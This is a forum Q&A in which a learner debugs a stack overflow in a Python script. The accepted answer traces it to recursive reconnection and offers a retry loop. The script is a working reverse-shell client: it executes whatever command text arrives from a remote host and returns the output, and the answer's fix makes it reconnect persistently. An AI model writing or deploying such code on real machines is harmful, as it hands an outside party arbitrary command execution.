# Can't recover from a stack overflow

Tags: python, sockets, stack, overflow

This is a little script I made while learning Python, but for some reason it tells me the it can't recover from the stack over flow. This happens when the another server disconnect.

The script:

```
#/user/bin/python
import os
import socket
import subprocess
import errno
import threading
s = socket.socket()
host = '192.168.1.6'
port = 9999

def connect():
    try:
        s.connect((host,port))
    except Exception as msg:
        print("ERROR HAPPEND 2 ")
        connect()
    else:
        Work()

def Work():
    while True:
        data = s.recv(1024)
        print("Data : " + data.decode('utf-8'))
        if data[:2].decode("utf-8") == 'cd':
            os.chdir(data[3:].decode('utf-8'))
        if len(data) >0:
            cmd = subprocess.Popen(data[:].decode('utf-8'), shell=True,
                                   stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE,
                                   stdin=subprocess.PIPE)
            output_bytes = cmd.stdout.read() + cmd.stderr.read()
            output_str = str(output_bytes , "utf-8")
            s.send(str.encode(output_str + str(os.getcwd()) + '> '))
        else:
            s.shutdown(socket.SHUT_RDWR)
            s.close()
            thread1 = threading.Thread(target = connect)
            thread1.start()
            break

connect()
```

Comment: Could you paste the full error ?

Comment: Please post the stack trace

Comment: What stack overflow? And are you really piping data received from a socket directly into Popen?

Comment: Fix your indentation. What does that `else` match with?

Answer (score 1, accepted):

This code is wrong:

```
def connect():
    try:
        s.connect((host,port))
    except Exception as msg:
        print("ERROR HAPPEND 2 ")
        connect()
    else:
        Work()
```

If connection fails for some reason (refused, or even syntax error in the `try/except` block since you're not filtering the exception type), then you're printing the error message and try again by calling *recursively* your function.

Since the socket error is very likely to happen again since you're retrying immediately the same operation without changing anything (starting the other program for instance!), you get a stack overflow very quickly.

Fix, first step: let your connection crash with a proper error message

```
def connect():
    s.connect((host,port))
    Work()
```

Fix, second step: if you think that the connection can be established later, you can catch the exception, wait a while and retry, for example like this:

```
def connect():
    while True:
        try:
            s.connect((host,port))
            break  # connection OK, proceeed to Work
        except ConnectionRefusedError as e:
            print("{}, retry in 10s ...".format(str(e)))
            time.sleep(10)
    Work()
```

In your case, just after the socket is closed, you create another thread that calls `connect`, and fails to do so, recursively, which explains the problem you're experiencing when disconnecting the other side.